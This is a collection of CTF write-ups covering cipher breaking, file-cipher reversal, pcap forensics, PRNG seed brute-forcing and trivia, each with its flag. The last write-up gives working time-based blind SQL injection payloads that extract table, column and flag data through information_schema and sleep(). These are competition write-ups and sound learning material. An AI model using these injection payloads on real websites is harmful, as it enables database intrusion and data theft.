hmfcj omtyr 4bg9m tyrcj omtyr ovhtm 7ejc8 fkdls xqfmr kcjoh tm8fk d4926 dib44 bg907 c6di4 9229e 707c5 ha492 38107 c6di2 705a3 49216 b43af 8381b 45a35 ha270 3af84 bg98f kd3af 83af8 5a3b4 ## Analysis So this is a known-ciphertext (a.k.a. ciphertext-only) attack. As standard, we always start with some recon. Hopefully, something wesee from our analysis is 'interesting' in some way that makes us pursuefurther. Here's a list of what we did. * Collapse away the newlines and spaces. There is a chance that the blocks of five are a reflection of the fact that this is could be a historical cipher, but most of the analysis we could do on this visual form we could do more easily on a cleaned up form.* For n-grams, where n is 1..6, what is the used alphabet? Frequency analysis? Is the character usage uniform? (It totally is not) Here is the distribution of all characters: f: 67 m: 56 k: 54 g: 51 d: 48 9: 44 l: 43 8: 42 s: 40 b: 35 r: 33 4: 32 j: 30 t: 30 c: 29 e: 29 h: 28 n: 26 q: 25 x: 23 a: 21 o: 21 6: 20 i: 17 7: 16 y: 16 z: 15 1: 10 p: 10 3: 9 u: 9 2: 8 5: 7 v: 6 0: 5 w: 5 Here is the distribution of all bigrams: 8f: 36 fk: 36 kd: 36 4b: 23 bg: 23 g9: 23 fm: 20 ls: 20 sx: 20 xq: 20 rk: 18 mr: 17 cj: 16 jo: 16 ty: 16 9g: 15 gl: 15 le: 15 mt: 15 yr: 15 ht: 14 tm: 14 nz: 13 zs: 13 6d: 12 di: 12 ej: 11 mf: 11 7e: 10 ah: 10 hm: 10 jc: 10 16: 8 bn: 8 ng: 8 q8: 8 dl: 7 sl: 7 9a: 6 ef: 6 k4: 6 49: 5 92: 5 dh: 5 gn: 5 ip: 5 kc: 5 mn: 5 ns: 5 pu: 5 3a: 4 5h: 4 9h: 4 af: 4 b4: 4 c8: 4 f8: 4 g8: 4 ha: 4 ov: 4 pw: 4 qm: 4 sb: 4 wu: 4 07: 3 5a: 3 70: 3 7c: 3 96: 3 9l: 3 a3: 3 cc: 3 d6: 3 dm: 3 el: 3 g4: 3 j8: 3 k8: 3 lq: 3 m7: 3 ma: 3 qj: 3 r4: 3 u9: 3 27: 2 38: 2 6g: 2 6l: 2 81: 2 83: 2 9f: 2 9p: 2 c6: 2 d4: 2 d7: 2 d8: 2 dn: 2 dp: 2 e4: 2 e7: 2 e8: 2 e9: 2 ff: 2 i8: 2 ib: 2 in: 2 l8: 2 o8: 2 o9: 2 oe: 2 oh: 2 ol: 2 om: 2 qc: 2 r1: 2 rc: 2 s4: 2 sz: 2 vh: 2 zx: 2 03: 1 05: 1 10: 1 1b: 1 21: 1 22: 1 23: 1 26: 1 29: 1 2c: 1 34: 1 35: 1 3b: 1 43: 1 44: 1 45: 1 69: 1 6b: 1 6f: 1 6o: 1 84: 1 85: 1 90: 1 98: 1 9e: 1 9m: 1 a1: 1 a2: 1 a4: 1 ao: 1 c1: 1 c5: 1 c9: 1 cn: 1 d1: 1 d3: 1 d5: 1 d9: 1 dc: 1 df: 1 dg: 1 ds: 1 e1: 1 f9: 1 fc: 1 fh: 1 fi: 1 fn: 1 gc: 1 i1: 1 i2: 1 i4: 1 i9: 1 ie: 1 ii: 1 jq: 1 k7: 1 kf: 1 ki: 1 kr: 1 l5: 1 li: 1 ll: 1 m4: 1 m8: 1 o4: 1 o6: 1 oa: 1 on: 1 ot: 1 po: 1 q4: 1 q7: 1 q9: 1 qf: 1 ql: 1 qq: 1 qv: 1 qx: 1 rb: 1 rf: 1 ri: 1 rl: 1 rm: 1 ro: 1 rs: 1 rw: 1 s6: 1 s7: 1 s8: 1 s9: 1 sm: 1 u4: 1 u7: 1 u8: 1 uf: 1 ug: 1 ul: 1 v4: 1 vb: 1 vn: 1 vo: 1 wp: 1 xb: 1 xg: 1 xv: 1 y9: 1 The single character distribution is alarming, but the bigramdistribution is even more alarming. In particular, notice the exact 36counts of '8f', 'fk', and 'kd'. This screamed to us, and we found thatthere are exactly 36 counts of '8fkd'. We then reasoned that this groupof characters might map back to a single unique n-gram in the plaintext.To follow this potential idea, we replaced '8fkd' with 'E' (arbitrary)in the ciphertext, and proceeded to repeat this through the rest of theciphertext. 8fkd: E gnsl: R 6di: J 381: = 4bg9: I 3af8: S 7ejc: K 270: @ lsxq: A 5ha: T ahmf: L krwp: # fmrk: B 16: U bng: M qxv: ü 9gle: C elqj: V 492: N jqvo: ~ mtyr: D ov: W szx: O ty: ➜ cjo: F 07c: X pwu: P 29e7: & htm: G 5a3: Y ipu: Q nzs: H b4: Z (This is actually our original table that we produced, and the Unicode is aside effect of team member trolling) We get this text (with the special characters replaced and newlines added forreading cleanliness, this is 272 characters). JUWGHAFEDMIPCBILDIGKHMNFACBILDAKFCCEAEGHKEOMIPKFCCEAEGHJ QBQADDQRQCKERAD3WIAEDUREAEJHIGLBEDUREEPEGBFVEHAFIGLBEKEG HMEAEADORTUBFJCBILDBFVEHMEJMEJVEAEKCBILCUADFLGIBFGLHMEEG KUCIAIJEUA4MFHECBILQC5EIJETWHIBBKF6CIJHDIAEFAAEBEPIGHCBI LFDIDFDWGKEABFGENJZIXJN7XTN8XJ9YNUZS8ZYT9SIESSYZ As one idea, we threw this into a single substitution cipher solvertrying statistical analysis on English. COUNTRIES HAV FLAGS AND THWIRFLAGSR DIFFERENT DEY HAV DIFFERENTCXLXRSSXMXFDE MRS3 U ARE SOME RECTANGLE SOME EVEN LIKE TRIANGLE DEN THERER SYMBOLIC FLAGS LIKE THE CHECKERED FLAG FOR SIGNALING THE END OF A RACE OR4 HITE FLAGXF5 EACE BUT ALL DI6FACTS ARE IRRELEVANT FLAG IS ASIS UNDERLINEW CZAJCW7JBW8JC9PWOZQ8ZPB9QAEQQPZ We had to clean this up manually. In particular, we knew that the laststring is a 32 character hex string.. because the answer format isASIS\_md5. Notice right before the end.. *FLAG IS ASIS UNDERLINE*. Sowe know that they are giving away the flag. We needed to clean this textup as best we can by guessing the text. The organizers were also cleverin mixing numbers into the plaintext (to make it easier to correlateback to the numerics in the hash) by including gems like "TH3IR" and"C0L0R". Once cleaned, we had this potential flag. 3c6a1c371b381c943065864b95ae5546 Even after our attempted deciphering of the previous message, we weren'tsure about the correctness of the characters `12456789x`. The javascript code in the ASIS ctf website checks for flag correctnessbefore sending it serverside (We did test to make sure they they didalso do server side validation :) ). The webpage hard codes the SHA-256of the right answer, presumably to minimize server load, so we couldverify our answers on our own boxes before shipping it up. So here isthe ~~pukey~~ Python that we used to bruteforce the the remaining flagpossibilities. ```pythonfrom itertools import permutationsfrom hashlib import sha256 def test(s): e = '9f2a579716af14400c9ba1de8682ca52c17b3ed4235ea17ac12ae78ca24876ef' return sha256('ASIS_' + s).hexdigest() == e m = '3c6a1c371b381c943065864b95ae5546's = '12456789x'for p in permutations(s): def f(sub, c): if c in sub: return sub[c] else: return c sub = {c : d for c, d in zip(s, p)} z = ''.join(f(sub, c) for c in m) if test(z): print z break``` And it dumps out the flag! ASIS_3c5a6c386b326c143059254b19ae9945
# Cryptor ## The GivenWe have found the cryptor source code. Decrypt the file. ```c++#include <stdio.h>#include <stdlib.h>#include <string.h>#include <time.h> using namespace std;int bitXor(int, int); int main(int argc, char **argv){ srand(time(NULL)); char *path=new char[30]; if(argc > 1) path = argv[1]; else { printf("\nenter file\n"); scanf("%s",path); } int g = rand() % 512 + 32; int n = rand() % g; int mask = rand() % 256; FILE *inFile = fopen(path, "rb"); FILE *outFile = fopen(strcat(path, "_Crypted"), "wb"); if(inFile == NULL || outFile == NULL) { printf("Error\ncant read/write file\n"); return 1; } unsigned char H, L; unsigned char *readBuffer = new unsigned char[g], *writeBuffer = new unsigned char[g]; while(!feof(inFile)) { int len = fread(readBuffer, 1, g, inFile); if(len < g) fwrite(readBuffer , 1 , len , outFile); else { for(int i = 0 ; i < g ; i++) { int nIndex = i + n; int pIndex = i - n; if(nIndex >= g) nIndex -= g; if(nIndex < 0) nIndex += g; if(pIndex >= g) pIndex -= g; if(pIndex < 0) pIndex += g; H = readBuffer[nIndex] / 16; L = readBuffer[pIndex] % 16; writeBuffer[i] = bitXor(16 * H + L, mask); } fwrite(writeBuffer , 1 , g , outFile); } } fclose (inFile); fclose (outFile); printf("\nsave decryption code: %d.%d.%d\n", g, n, mask); return 0;} int bitXor(int x, int y){ int a = x & y; int b = ~x & ~y; int z = ~a & ~b; return z;}``` Also included is a file named "flag.png_Crypted". ## AnalysisLooks like we choose a random key here:```c++int g = rand() % 512 + 32;int n = rand() % g;int mask = rand() % 256;```First impression: there are about `512 * 512 * 256 = 2^26` possible keys,which is a tiny search space. Here is where we do the actual encryption:```c++unsigned char H, L;unsigned char *readBuffer = new unsigned char[g], *writeBuffer = new unsigned char[g];while(!feof(inFile)){ int len = fread(readBuffer, 1, g, inFile); if(len < g) fwrite(readBuffer , 1 , len , outFile); else { for(int i = 0 ; i < g ; i++) { int nIndex = i + n; int pIndex = i - n; if(nIndex >= g) nIndex -= g; if(nIndex < 0) nIndex += g; if(pIndex >= g) pIndex -= g; if(pIndex < 0) pIndex += g; H = readBuffer[nIndex] / 16; L = readBuffer[pIndex] % 16; writeBuffer[i] = bitXor(16 * H + L, mask); } fwrite(writeBuffer , 1 , g , outFile); }}```So `g` is used as a block length, `n` is used as an offset, and `mask` is usedas a mask. The way this code is written, it's kind of hard to see where bitsare going in all of that arithmetic, so let's simplify it a bit. First, let's look at these lines:```c++int nIndex = i + n;if(nIndex >= g) nIndex -= g;if(nIndex < 0) nIndex += g;``` The index `i` loops over the block, and we're adding the offset `n` to indexlater into the block. The if statements make sure that we wrap around insteadof running off the end of the block. I find it easier to read as```c++int nIndex = (i + n) % g;```Similarly,```c++int pIndex = (i - n) % g;``` H and L are being grabbed from those offset bytes. But dividing by 16 is thesame as bit shifting right by 4 bits, and modding by 16 is the same as maskingaway everything but the lowest order 4 bits, so we can reason better aboutwhere the bits are going if we write it as```c++H = readBuffer[nIndex] >> 4;L = readBuffer[pIndex] % 0xf;``` In the same vein, we can rewrite `16 * H + L` as `H << 4 | L`. The bitXor function is literally just a bitwise xor, so I have no clue why thatis a function. Rewrite it as```c++writeBuffer[i] = (H << 4 | L) ^ mask;``` Here's what we have now:```c++unsigned char H, L;unsigned char *readBuffer = new unsigned char[g], *writeBuffer = new unsigned char[g];while(!feof(inFile)){ int len = fread(readBuffer, 1, g, inFile); if(len < g) fwrite(readBuffer , 1 , len , outFile); else { for(int i = 0 ; i < g ; i++) { int nIndex = (i + n) % g; int pIndex = (i - n) % g; H = readBuffer[nIndex] >> 4; L = readBuffer[pIndex] & 0xf; writeBuffer[i] = (H << 4 | L) ^ mask; } fwrite(writeBuffer , 1 , g , outFile); }}``` Great. It looks like each byte of ciphertext is made of the high-order bits ofa later byte and the low-order bits of an earlier byte (modulo `g`). Everythingis processed as blocks of g at a time, and the leftovers are kept as plaintext. Now let's break it. First we figure out how decryption works. Notice that each byte of plaintext is"sampled" twice: once for its high bits and once for its low bits. For example,the low bits of `p[0]` are found at `c[n]` and the high bits are in `c[g - n]`,masked with the mask. So`p[i] = ((c[(i - n) % g] >> 4) << 4) | (c[(i + n) % g] & 0xff)`. The code for the decryption therefore looks like this:```pythonimport sys read = [ord(c) for c in open('flag.png_Crypted').read()]blocks = [read[i * g:(i + 1) * g] for i in range(len(read) / g)]write = [0] * gfor block in blocks: for i in range(g): nIndex = (i - n) % g pIndex = (i + n) % g H = block[nIndex] >> 4 L = block[pIndex] & 0xf write[i] = (H << 4 | L) ^ mask sys.stdout.write(''.join(chr(c) for c in write))sys.stdout.write(''.join(chr(c) for c in read[g * (len(read) / g):]))``` Now we just need to find the key (g, n, mask). This is made easier by knowningsomething about the plaintext: it is a PNG, which has the header"\x89\x50\x4e\x47". This gives us a very fast test to brute force the key.```pythonread = [ord(c) for c in open('flag.png_Crypted').read()]write = [0, 0, 0, 0]for g in range(32, 512 + 32): for n in range(g): for mask in range(256): for i in range(4): nIndex = (i - n) % g pIndex = (i + n) % g H = read[nIndex] >> 4 L = read[pIndex] & 0xf write[i] = (H << 4 | L) ^ mask if write == [0x89, 0x50, 0x4e, 0x47]: print g, n, mask``` Once we have the key, we just plug it into the decryption code, and we indeedget a PNG. ![Decrypted Flag](cryptor.png) Open it up, and it's the flag`ASIS_449e435e4c40dfa726f11b83a07b5471`.
# Windows ## The GivenAppend what you find to "ASIS\_" and send that as flag. An [mp4 video](windows_assets/windows.mp4) is attached. It's a video of smallpictures of windows flashing across the screen with a strange soundtrack. ![Example Frame](windows_assets/windows.png) ## AnalysisLet's start with the audio. Pull out the audio with ffmpeg. ffmpeg -i windows.mp4 windows.wav The audio sounds like it's something in reverse, and opening it up in Audacityand reversing it confirms this. It's a man's voice saying`51324984652187698521487459648201`. This is 32 characters, so it could be anmd5 hash, but appending that to `ASIS_` isn't correct flag, so we're not doneyet. Now we look at the video. If you stare at it for awhile, it looks like thewindows flashing on the screen are tracing out some sort of pattern, but it'sreally hard to tell. Additionally, there seem to be a fixed set of positions inwhich the windows appear. In order to get a better look at it, we can turn the video into a GIF so wecan scroll a frame at a time in GIMP. ffmpeg -i windows.mp4 windows.gif Only the first frame of the generated GIF has the black background, so wedelete that with the color picker tool, and we can see that it was indeed apattern. ![QR looking image](windows_assets/windows_qr_before.png) It's a QR code (we've seen enough of those before in other CTFs, turns out this one wasa Version 1 QR code, which is 21x21). The QR scanner apps on our phonescouldn't quite read it, so we had to fudge it into a more readable state inGIMP with creative selections and scaling (in particular, I selected all ofthe white with the color picker tool, inverted the selection, grew theselection by 5 pixels, then shrank it by 3, then flood filled black, thenscaled it down to 21x21 without interpolation). ![QR after formatting](windows_assets/windows_qr_after.png). The QR code encodes the message "xorwith313". So we xor the above numberwith 313 51324984652187698521487459648201 ^ 313 = 51324984652187698521487459648496 The flag is `ASIS_51324984652187698521487459648496`.
# PCap ## Given We're given a pcap file. [The pcap file](pcap.pcap). ## Observations There were two ip addresses communicating with each other: * 172.16.133.133* 172.16.133.149 ## TCP Conversations There was some substantial cover traffic, but in the end, we identifiedjust three categories of communication that were relevant: * TCP Stream 0 -- Used as a just a chat apparently between the two users on either end. 172.16.133.149: hello 172.16.133.133: I need secret key 172.16.133.149: ok 172.16.133.149: secret key will be sent on 6 parts 172.16.133.149: secret key : part 1 is M)m5s6S 172.16.133.149: did you received part 1 of secret key? 172.16.133.133: yes please send part 2 172.16.133.149: part 2 of secret key is ^[>@# 172.16.133.133: I recieved part 2 172.16.133.133: ok. please send me the other parts too 172.16.133.149: part 3 of secret key is Q3+1 172.16.133.149: did you received part 3? 172.16.133.133: yes 172.16.133.149: are you ready to receive part 4? 172.16.133.133: yes, please send 172.16.133.149: part 4 is 0PD. 172.16.133.133: ok. i received part 4 172.16.133.133: Please send me part 5 172.16.133.149: ok 172.16.133.149: part 5 of secret key is KE#cy 172.16.133.133: I received part 5 172.16.133.149: part 6 of secret key is PsvqH 172.16.133.133: ok. I received all parts of secret key. 172.16.133.133: Thanx * HTTP file transfers hitting various ports, but all HTTP, and all were 172.16.133.133 requesting files from 172.16.133.149. These all requested files of filenames that were md5 hashes. For example: GET /files/d33cf9e6230f3b8e5a0c91a0514ab476 Additionally, The ASIS organizers realized that there was a bug inproblem in that they forgot to provide two files. These were`053dc897d3e154dd5ed27c46b738850d` and `21eae902cf5b82c7b207e963a130856d`. * An HTTP download of an Apache index page, where the contents of the index page all corresponded to files downloaded in the previously mentioned HTTP file transfers. Interestingly, those file transfers used ports and web servers that weren't apache.. this seems to just be something meant to confuse analysts. though. I've reproduced the table here in an ascii format. Filename Date Last Modified Filesize d33cf9e6230f3b8e5a0c91a0514ab476 24-May-2013 09:21:16 61440 e564f66f2cf3e974887ea85028a317c6 24-May-2013 09:21:22 61440 89799fdf064c77dad7923548140c18c5 24-May-2013 09:21:23 61440 f6fb802feded5924fff1749b11e44c9b 24-May-2013 09:21:26 61440 c68cc0718b8b85e62c8a671f7c81e80a 24-May-2013 09:21:33 58009 326f79adc7ee143dcbb4cb8891a92259 24-May-2013 09:21:20 61440 053dc897d3e154dd5ed27c46b738850d 24-May-2013 09:21:31 61440 2aa242d4dbcb9b6378229c514af79b05 24-May-2013 09:21:24 61440 21eae902cf5b82c7b207e963a130856d 24-May-2013 09:21:32 61440 7356949650ccadfe1fb3a80b0db683d1 24-May-2013 09:21:26 61440 5b6540cd89bbd12bf968e110b965a840 24-May-2013 09:21:19 61440 40f4d5abfcdb369eeb0ac072796b7f30 24-May-2013 09:21:30 61440 6afd1bbadfabc3da6f3b7265df75744f 24-May-2013 09:21:27 61440 57f18f111f47eb9f7b5cdf5bd45144b0 24-May-2013 09:21:17 61440 35639a4410f245791ce5d2945702c4dc 24-May-2013 09:21:29 61440 1e13be50f05092e2a4e79b321c8450d4 24-May-2013 09:21:18 61440 fe7fe85cb5a023310f251acc2993d62e 24-May-2013 09:21:25 61440 4b87fbafcd05a39da90d69943393f79d 24-May-2013 09:21:21 61440 189facdce68effbf99ab7263c8b87304 24-May-2013 09:21:28 61440 255029ecf7e1a35b368ed123e2955099 24-May-2013 09:21:20 61440 ## Some analysis We noticed: * One file, `d33cf9e6230f3b8e5a0c91a0514ab476`, had the magic number of a 7zip archive. It did not correctly decompress.* One file, `c68cc0718b8b85e62c8a671f7c81e80a`, has a smaller filesize than the rest of the files. We reasoned that all of these files could be blocks of a larger archive,and that the smaller file is the trailing block at the end. Just onspeculation, we sorted the files by date last modified. Date Last Modified Filename Filesize 09:21:16 24-May-2013 d33cf9e6230f3b8e5a0c91a0514ab476 61440 09:21:17 24-May-2013 57f18f111f47eb9f7b5cdf5bd45144b0 61440 09:21:18 24-May-2013 1e13be50f05092e2a4e79b321c8450d4 61440 09:21:19 24-May-2013 5b6540cd89bbd12bf968e110b965a840 61440 09:21:20 24-May-2013 255029ecf7e1a35b368ed123e2955099 61440 09:21:20 24-May-2013 326f79adc7ee143dcbb4cb8891a92259 61440 09:21:21 24-May-2013 4b87fbafcd05a39da90d69943393f79d 61440 09:21:22 24-May-2013 e564f66f2cf3e974887ea85028a317c6 61440 09:21:23 24-May-2013 89799fdf064c77dad7923548140c18c5 61440 09:21:24 24-May-2013 2aa242d4dbcb9b6378229c514af79b05 61440 09:21:25 24-May-2013 fe7fe85cb5a023310f251acc2993d62e 61440 09:21:26 24-May-2013 7356949650ccadfe1fb3a80b0db683d1 61440 09:21:26 24-May-2013 f6fb802feded5924fff1749b11e44c9b 61440 09:21:27 24-May-2013 6afd1bbadfabc3da6f3b7265df75744f 61440 09:21:28 24-May-2013 189facdce68effbf99ab7263c8b87304 61440 09:21:29 24-May-2013 35639a4410f245791ce5d2945702c4dc 61440 09:21:30 24-May-2013 40f4d5abfcdb369eeb0ac072796b7f30 61440 09:21:31 24-May-2013 053dc897d3e154dd5ed27c46b738850d 61440 09:21:32 24-May-2013 21eae902cf5b82c7b207e963a130856d 61440 09:21:33 24-May-2013 c68cc0718b8b85e62c8a671f7c81e80a 58009 And it totally screamed to us, since the first file listed is the onethat was marked as a 7zip archive, and the last file here is the onewith the smaller filesize. We extracted the files from the HTTP transfers and mashed them togetherand tried to decompress them. We were prompted for a password, which wethen correlated to that other tcp stream that was the conversation. Fromthat, we ripped the key: `M)m5s6S^[>@#Q3+10PD.KE#cyPsvqH`. The archivesuccessfully decompressed, and there was a TIFF image with the flag. ![Pcap Flag Image](pcap_flag_image.png) We saw this and were worried that there was going to be stego in thisimage at this point, but thankfully we were wrong :). ASIS_19f8c9dd916d8d73ba184227071debd4
#include <stdlib.h>#include <stdio.h>#include <limits.h> unsigned int outputs[7][4] = { {0x7358837a, 0x6e1b2658, 0x3c00c5ff, 0x8c0d4aa}, {0x34d8c3b5, 0x5b56dca1, 0x78236d7, 0x1973085e}, {0x1f49456c, 0x27c0fa1d, 0x145214aa, 0x6200299c}, {0x1fea6614, 0x41cdb864, 0x53c0ed56, 0x63642916}, {0x4e81abc7, 0x792ce075, 0x7d2bc59c, 0x42a11ada}, {0x683d3f5d, 0xcaae38d, 0x7ec81c18, 0x444671e6}, {0x28c9a8fe, 0x3324b23, 0x3075f253, 0x60d2e9d2}}; unsigned int seeds[7] = {544485486,1914712179,811888180,874524781,1915974758,825319712,555819297}; void printasascii(unsigned int value){ printf("%c", (value) & 0xff); printf("%c", (value >> 8) & 0xff); printf("%c", (value >> 16) & 0xff); printf("%c", (value >> 24) & 0xff);} typedef union { unsigned int integer; unsigned char bytes[4];} output_t; int main(int argc, char* argv[]){ output_t value; value.bytes[0] = 0x20; value.bytes[1] = 0x20; value.bytes[2] = 0x20; value.bytes[3] = 0x20; unsigned int outcome; unsigned int tries = 0; size_t output_row = 0; size_t seeds_found = 0; while(1){ for(output_row = 0; output_row < 7; output_row++){ srandom(value.integer); outcome = random(); if(outcome == outputs[output_row][0]){ outcome = random(); if(outcome == outputs[output_row][1]){ outcome = random(); if(outcome == outputs[output_row][2]){ outcome = random(); if(outcome == outputs[output_row][3]){ seeds[output_row] = value.integer; seeds_found++; printf("Found %i/7 seeds\n", seeds_found); printf("Seed %i = \"", output_row); printasascii(value.integer); printf("\" (%i)\n", value.integer); if(seeds_found == 7) break; } } } } } /* iterate printable ascii */ if(value.bytes[3] < 0x7f){ value.bytes[3]++; } else { value.bytes[3] = 0x20; if(value.bytes[2] < 0x7f){ value.bytes[2]++; } else { value.bytes[2] = 0x20; if(value.bytes[1] < 0x7f){ value.bytes[1]++; } else { value.bytes[1] = 0x20; if(value.bytes[0] < 0x7f){ value.bytes[0]++; } else { printf("Exhausted keyspace.\n"); break; } } } } tries++; if(tries % 1000000 == 0){ printf("Tried %i seeds\nCurrent seed trying: ", tries); printasascii(value.integer); printf("\n"); } } for(output_row = 0; output_row < 7; output_row++){ printasascii(seeds[output_row]); } printf("\n"); for(output_row = 0; output_row < 7; output_row++){ printf("%i\n",seeds[output_row]); } return 0;}
In this task we are given anInnoSteup file, setup.exe. The setup.exe contained a long eula, and a passwordrequirement to install the program. Bypassing the password could be done withollydbg or just a simple innosetup unpacker. Unpacking the setup we see a C programwhich prints to screen that we already saw the flag. We are also given someother misleading information such as the password hash and salt (turns out thepassword was 1234567), but these are not the flag.Going back to the EULA we read itto find out that in section 7A it reads: YOU MAY SUBMIT THIS TO GET TEN POINTS:ILOVEREADINGEULAS. ILOVEREADINGEULAS is the flag.
This is a reference to DEFCON 2006’s trivia question whichused EBFE is to x86 as ____ is to PowerPC. This time we have to find the ARM64equivalent.<span>A quickgoogle search tells us that EBFE is a jmp instruction, but ARM does not havesuch instruction, they use branches instead, b is our instruction. Looking inthe ARMv8 reference manuals we can see that this refers to EAFFFFFE. This doesnot work however as that is the ARM32 variant. Converting to ARM64 we get14000000. Because ARM64 is also little endian, the answer is 00000014.</span><span>Reference manual: http://www.cs.utexas.edu/~peterson/arm/DDI0487A_a_armv8_arm_errata.pdf</span>
<span>Flag is out there: http://[2a02:6b8:0:141f:fea9:d5ff:fed5:XX01]/</span>Flag format: CTF{..32 hexes..} <span>So we know we are given an IPv6 address missing two characters, hence XX. Thankfullywe can search for the address in an ipv6 database which tells us that there isa website with an ipv6 address of http://[2a02:6b8:0:141f:fea9:d5ff:fed5:6901]/.</span><span>Now I don’t have an ipv6 ISP, but there are websites out there (hahaha) that will actas a proxy / ipv6 gateway for ipv4 users such as myself. Entering in thisaddress to the gateway at www.ipv6proxy.netbrings us to a webpage with the following information:</span><span>“Vladimir Mikhaylovich Smirnov (born 7 March 1964) is an Kazakhstani formercross-country skier who raced from the 1982 until 1991 for the USSR and, later,for Kazakhstan. First Olympic champion from independent Kazakhstan. He is alsoa vice president of the International Biathlon Union. Smirnov is a formermember of International Olympic Committee.”</span>Viewing the source we see our flag in the comments:CTF{7a0dd6d4556a7ed60e6f7686eae0590d}
---- Writeup ----CTF: BACKDOOR 2014Problem: binary-10Author: Dr.OptixAll rights reserved.-----------------I will start with basic recon.$ file bin10 bin10: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=e0f10986e9a0fc976ff2be10b411f368bfd53700, not stripped$ strings bin10 /lib64/ld-linux-x86-64.so.2CyIklibstdc++.so.6__gmon_start___Jv_RegisterClassespthread_cancel_ZNSsD1Ev_ZNSt8ios_base4InitD1Ev_ZNSsC1EPKcRKSaIcE_ZNKSs7compareEPKc_ZNSaIcEC1Ev_ZSt3cin_ZStrsIcSt11char_traitsIcESaIcEERSt13basic_istreamIT_T0_ES7_RSbIS4_S5_T1_E__gxx_personality_v0_ZSt4cout_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc_ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6__ZNSaIcED1Ev_ZNSsC1Ev_ZNSolsEPFRSoS_E_ZStlsIcSt11char_traitsIcESaIcEERSt13basic_ostreamIT_T0_ES7_RKSbIS4_S5_T1_E_ZNSt8ios_base4InitC1Evlibgcc_s.so.1_Unwind_Resumelibc.so.6__cxa_atexit__libc_start_mainGCC_3.0GLIBC_2.2.5CXXABI_1.3GLIBCXX_3.4fff.l$ Lt$(L|$0H40511702a6193f9b38d37699e676fd40Enter the password: a_few_basic_skills_will_doThe flag for this level is That doesn't seem to be the correct password.Access Denied.;*3$"zPLRThis looks like a potential flag: 40511702a6193f9b38d37699e676fd40Bingo! Flag is indeed: 40511702a6193f9b38d37699e676fd40~ Q.E.D
---- Writeup ----CTF: BACKDOOR 2014Problem: web-50Author: Dr.OptixAll rights reserved.NOTE: Another solution proof made directly from the notes I took while solving-----------------This problem starts at:http://backdoor.cognizance.org.in/problems/web50/search.phpAt the first look it seems to be a SQL injection problem.The source disclosed nothing usefull.I was unable to cause an error using ' or " as bad injections. Instead I injected %%%. Because it is doing a search behind the scene I tought I could make it spit out everything that can be found.I got this:Quote    SpeakerUse the Force, Luke.    Obi-Wan KenobiDo… or do not. There is no try.    Master YodaI find your lack of faith disturbing.    Darth VaderFear is the path to the dark side. Fear leads to anger. Anger leads to hate. Hate leads to suffering.    Master YodaYou’ve never heard of the Millennium Falcon? … It’s the ship that made the Kessel run in less than 12 parsecs.    Han SoloAAARARRRGWWWH.    ChewbaccaIn the source I found this after all:    class="table table-striped">This makes me think I have only a part of the table. Also I have to do with aLIKE clause SQL injection.I should treat the query as something like this:    SELECT column1, column2    FROM table1    WHERE column1 like '%' + @column1 + '%'I will take a break from this for now.Back on this one. I will try to bypass LIKE clause on local host first.    CREATE TABLE mytable(       id INT NOT NULL AUTO_INCREMENT,       info VARCHAR(100) NOT NULL,       PRIMARY KEY ( id )    );I found a valid payload construction:    search=a%' and 1=1 and '%'='On local I found a building block like this one:    select table_name from (select table_name from     information_schema.tables where table_schema=database()) b where     table_name like "m%" and sleep(5)I'm starting to get fustrated. Maybe I should go with sqlmap. Not yet tho.I found the correct building block:    %%%' and (select table_name from information_schema.tables where     table_schema=database() and table_name like "m%" and sleep(2)) and     '%'='Complete payload schema:    search=%%%' and (select table_name from information_schema.tables     where table_schema=database() and table_name like "the_f%" and sleep    (2)) and '%'='Potential table names obtained with the above payload schema:    qu    the_flag_is_over_hereI found the table "the_flag_is_over_here", by hand. Now I have to extract it's columns.To find column names I have to use information_schema.columns. To get the columns of a particular table I have to use:select column_name from information_schema.columns where table_name="mytable";Now I have to use that with the payload building block.I have an idea how to find the column number for the "the_flag_is_over_here" table. Using this:    select * from (select count(*) as count from     information_schema.columns where     table_name="mytable") t where t.count = 1 and sleep(2);The new payload looks like this:    %%%' and (select * from (select count(*) as count from         information_schema.columns where table_name="mytable") t where     t.count = 2 and sleep(2)) and '%'='As expected the table has one column, probably with the name of "flag".To make sure of the name I should use information_schema.columns to get at least the first and the second letters from the column name.New payload for finding column name or at least a few letters.First letter is "t".Last letter is "e".For easy manual search the new payload is:    search=%%%' and (select c from (select column_name as c from         information_schema.columns where table_name="the_flag_is_over_here"     limit 1) t where c like concat("t", char(1),"%") and sleep(5)) and     '%'='Potential name: tw..ePotential name: tw..ePotential name: twi..ePotential name: twisted..ePotential name: twisted_b..ePotential name: twisted..ePotential name: twisted_..ePotential name: twisted_..amePotential name: twisted_..namePotential name: twisted_namePotential name: twisted_column_nameBingo! That's the column name.Payload that will demonstrate this is the column name:    search=%%%' and (select c from (select column_name as c from         information_schema.columns where table_name="the_flag_is_over_here"     limit 1) t where c like concat("twisted_column_name") and sleep(5))     and '%'='Now let's extract the info.Damit i need the database name. Maybe I can concat it.Payload building block for database name extraction:    search=%%%' and (select c from (select table_schema as c from     information_schema.tables where table_name="the_flag_is_over_here"     limit 1) t where c like concat("s", char(97), "%") and sleep(5)) and     '%'='Database name: sqli_dbPayload building block for flag extraction:    search=%%%' and (select twisted_column_name from     sqli_db.the_flag_is_over_here where twisted_column_name like concat    ("", char(51),"%") and sleep(5)) and '%'='Partial flag: D 5 A B | A F 3 9 | 1 F 7 B | C 7 E 7 |Extracted flag:D 5 A B | A F 3 9 | 1 F 7 B | C 7 E 7 |C D A 8 | C 1 2 8 | E 5 C A | 3 1 8 7Confirmation:    search=%%%' and (select twisted_column_name from     sqli_db.the_flag_is_over_here where twisted_column_name =     "D5ABAF391F7BC7E7CDA8C128E5CA3187" and sleep(5)) and '%'='The flag is: D5ABAF391F7BC7E7CDA8C128E5CA3187~ Q.E.D
